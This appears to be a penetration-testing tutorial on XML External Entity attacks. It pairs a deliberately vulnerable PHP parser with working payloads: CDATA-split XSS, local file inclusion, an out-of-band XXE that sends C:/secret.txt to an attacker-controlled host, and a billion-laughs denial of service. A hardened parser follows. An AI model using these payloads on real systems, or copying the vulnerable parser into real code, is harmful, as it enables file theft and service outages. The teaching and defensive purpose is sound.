Penetration Testing with OWASP Top 10 - 2017 A4 XML External Entities (XXE)




Proof Of Concept

<?php
// Proof of concept: deliberately vulnerable XML parsing (kept as-is, with comments added).
if (isset($_GET["submit"])) {
    $xml = $_GET["xml"];                   // untrusted XML taken straight from the request
    libxml_disable_entity_loader(false);   // (re-)enable loading of external entities
                                           // (deprecated in PHP 8.0, where loading is off by default)

    $dom = new DOMDocument();
    $dom->resolveExternals = true;         // fetch external DTD subsets
    $dom->substituteEntities = true;       // expand entity references into the document
    $dom->preserveWhiteSpace = true;
    $dom->loadXML($xml, LIBXML_NOENT);     // LIBXML_NOENT substitutes entities, SYSTEM ones included
    echo $dom->textContent;                // output is written back without HTML escaping
}

Manual Exploitation


Cross-site Scripting
<test><![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]></test>

File Inclusion
<!DOCTYPE change-log [
 <!ENTITY systemEntity SYSTEM "file.txt">
]>

<change-log>
 <text>&systemEntity;</text>
</change-log>

Out-of-band XML External Entity (OOB-XXE)
<!DOCTYPE change-log [
<!ENTITY % file SYSTEM "file:///C:/secret.txt" >
<!ENTITY % data SYSTEM "http://192.168.231.1/vulnerable/xml/oob/evil.dtd">
%data;
]>

<change-log>
<text>&send;</text>
</change-log>

Content of evil.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.231.1/keylogger/keylogger.php?c=%file;'>"> %all;

The content of file:///C:/secret.txt is captured by the listener.

Billion laughs attack

<!DOCTYPE lolz [
  <!ENTITY lol "lol ">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>
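The hardened counterpart to the proof of concept above, as an added example that is not code from the original post: it rejects any document that carries a DTD (which stops SYSTEM entities, the out-of-band variant and the recursive entities of the billion laughs payload before libxml expands anything), tells libxml never to fetch external resources, leaves LIBXML_NOENT out, and HTML-escapes the text before echoing it so the CDATA-based script injection shown earlier is rendered inert. The function name parseUntrustedXml and the sample inputs are assumptions constructed for the demo.

```php
<?php
// Added example (not from the original post): hardened replacement for the
// vulnerable proof of concept. Function names and sample inputs are assumptions.

declare(strict_types=1);

/**
 * Parse untrusted XML into a DOMDocument with every entity mechanism disabled.
 * Throws InvalidArgumentException when the input is rejected or malformed.
 */
function parseUntrustedXml(string $xml): DOMDocument
{
    // 1. Refuse any document that declares a DTD at all. A DTD is the only
    //    place entities can be defined, so this blocks file disclosure,
    //    out-of-band requests and entity-expansion (billion laughs) at once.
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        throw new InvalidArgumentException('DTD declarations are not accepted');
    }

    // 2. Belt and braces: a resolver that returns null makes libxml fail
    //    every external entity load. This works on all supported PHP versions,
    //    unlike libxml_disable_entity_loader(), which is deprecated in 8.0.
    libxml_set_external_entity_loader(static fn () => null);
    $previousErrorMode = libxml_use_internal_errors(true);

    $dom = new DOMDocument();
    $dom->resolveExternals   = false;   // never load external DTD subsets
    $dom->substituteEntities = false;   // never expand entity references

    // 3. LIBXML_NONET forbids network access during parsing. LIBXML_NOENT is
    //    deliberately absent: it is the flag that turns entity substitution on.
    $ok     = $dom->loadXML($xml, LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($previousErrorMode);

    if ($ok === false) {
        $reason = isset($errors[0]) ? trim($errors[0]->message) : 'unknown error';
        throw new InvalidArgumentException('Malformed XML: ' . $reason);
    }
    return $dom;
}

/** Escape extracted text before it is written into an HTML response. */
function renderText(DOMDocument $dom): string
{
    return htmlspecialchars($dom->textContent, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed sample inputs for the demo (not captured from any real system).
$samples = [
    'benign'     => '<change-log><text>release 1.2 published</text></change-log>',
    'script tag' => '<test><![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]></test>',
    'with DTD'   => '<!DOCTYPE x [<!ENTITY e "expanded">]><x>&e;</x>',
    'malformed'  => '<change-log><text>unterminated',
];

foreach ($samples as $label => $xml) {
    try {
        $dom = parseUntrustedXml($xml);
        echo $label, ': ', renderText($dom), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $label, ': rejected (', $e->getMessage(), ')', PHP_EOL;
    }
}
```

Run from the command line, the benign document prints its text, the CDATA sample prints `&lt;script&gt;alert(1)&lt;/script&gt;` (harmless when embedded in a page), and the DTD-bearing and malformed inputs are rejected with a reason. The DOCTYPE pre-check is the important control: the parser flags reduce exposure, but refusing DTDs outright removes the entity mechanism the whole attack class depends on.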
